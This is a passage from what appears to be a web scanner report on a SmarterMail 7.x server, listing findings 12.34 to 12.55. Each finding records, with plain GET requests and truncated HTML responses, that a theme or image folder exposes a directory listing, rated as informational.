Content-Length: 2305
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Window/CssImg/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:b
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/Window/">[To Parent Directory]</A>
...[SNIP]...

12.34. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/Img/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Controls/Window/Img/

Request

GET /App_Themes/Default/Controls/Window/Img/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:20 GMT
Content-Length: 1413
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Controls/Window/Img/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:blac
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Controls/Window/">[To Parent Directory]</A>
...[SNIP]...

12.35. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Flash/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Flash/

Request

GET /App_Themes/Default/Flash/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:05 GMT
Content-Length: 1706
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Flash/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>
...[SNIP]...

12.36. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/

Request

GET /App_Themes/Default/Images/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCompose.aspx?popup=true
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:54 GMT
Content-Length: 2178
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>
...[SNIP]...

12.37. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/16x16/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/16x16/

Request

GET /App_Themes/Default/Images/16x16/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:54 GMT
Content-Length: 18822
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/16x16/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.38. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Customer/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Customer/

Request

GET /App_Themes/Default/Images/Customer/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 3294
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Customer/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.39. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Customer/Pager/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Customer/Pager/

Request

GET /App_Themes/Default/Images/Customer/Pager/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Customer/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:06 GMT
Content-Length: 2842
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Customer/Pager/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bl
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/Customer/">[To Parent Directory]</A>
...[SNIP]...

12.40. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Icons/

Request

GET /App_Themes/Default/Images/Icons/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 1786
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Icons/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.41. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/IconMenuStats/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Icons/IconMenuStats/

Request

GET /App_Themes/Default/Images/Icons/IconMenuStats/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:06 GMT
Content-Length: 1717
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Icons/IconMenuStats/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;col
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/Icons/">[To Parent Directory]</A>
...[SNIP]...

12.42. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/MessageView/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Icons/MessageView/

Request

GET /App_Themes/Default/Images/Icons/MessageView/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:06 GMT
Content-Length: 2628
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Icons/MessageView/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/Icons/">[To Parent Directory]</A>
...[SNIP]...

12.43. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/MessageView/rollover/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Icons/MessageView/rollover/

Request

GET /App_Themes/Default/Images/Icons/MessageView/rollover/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/MessageView/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:18 GMT
Content-Length: 2196
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Icons/MessageView/rollover/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size:
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/Icons/MessageView/">[To Parent Directory]</A>
...[SNIP]...

12.44. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Invitations/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Invitations/

Request

GET /App_Themes/Default/Images/Invitations/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 3305
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Invitations/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.45. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Invitations/Button/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Invitations/Button/

Request

GET /App_Themes/Default/Images/Invitations/Button/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Invitations/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:06 GMT
Content-Length: 2415
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Invitations/Button/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;colo
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/Invitations/">[To Parent Directory]</A>
...[SNIP]...

12.46. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Misc/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Misc/

Request

GET /App_Themes/Default/Images/Misc/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 7465
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Misc/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.47. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Pager/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Pager/

Request

GET /App_Themes/Default/Images/Pager/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 2815
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Pager/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.48. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Plupload/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Plupload/

Request

GET /App_Themes/Default/Images/Plupload/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 2055
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Plupload/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.49. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Skin/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Skin/

Request

GET /App_Themes/Default/Images/Skin/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 5435
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Skin/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.50. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Stats/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/Stats/

Request

GET /App_Themes/Default/Images/Stats/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 1396
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/Stats/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.51. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/social_icons/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Images/social_icons/

Request

GET /App_Themes/Default/Images/social_icons/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:00 GMT
Content-Length: 2973
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Images/social_icons/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:blac
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/Images/">[To Parent Directory]</A>
...[SNIP]...

12.52. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Javascript/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Javascript/

Request

GET /App_Themes/Default/Javascript/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1375
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Javascript/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>
...[SNIP]...

12.53. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Sounds/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Sounds/

Request

GET /App_Themes/Default/Sounds/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:05 GMT
Content-Length: 1985
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/Sounds/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}

...[SNIP]...
<PRE>
<A href="/App_Themes/Default/">[To Parent Directory]</A>
...[SNIP]...

12.54. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/images/icons/dragdrop/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/images/icons/dragdrop/

Request

GET /App_Themes/Default/images/icons/dragdrop/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1509
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/dragdrop/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bl
...[SNIP]...
<PRE>
<A href="/App_Themes/Default/images/icons/">[To Parent Directory]</A>
...[SNIP]...

12.55. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/images/icons/iconmenu/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/images/icons/iconmenu/

Request

GET /App_Themes/Default/images/icons/iconmenu/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:03 GMT
Content-Length: 1707
Content-type: text/html; charset=utf-8
Connection: Close

<html>
<head>
<title>Directory Listing -- /App_Themes/Default/images/icons/iconmenu/</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:bl
...[SNIP]...
<PRE>
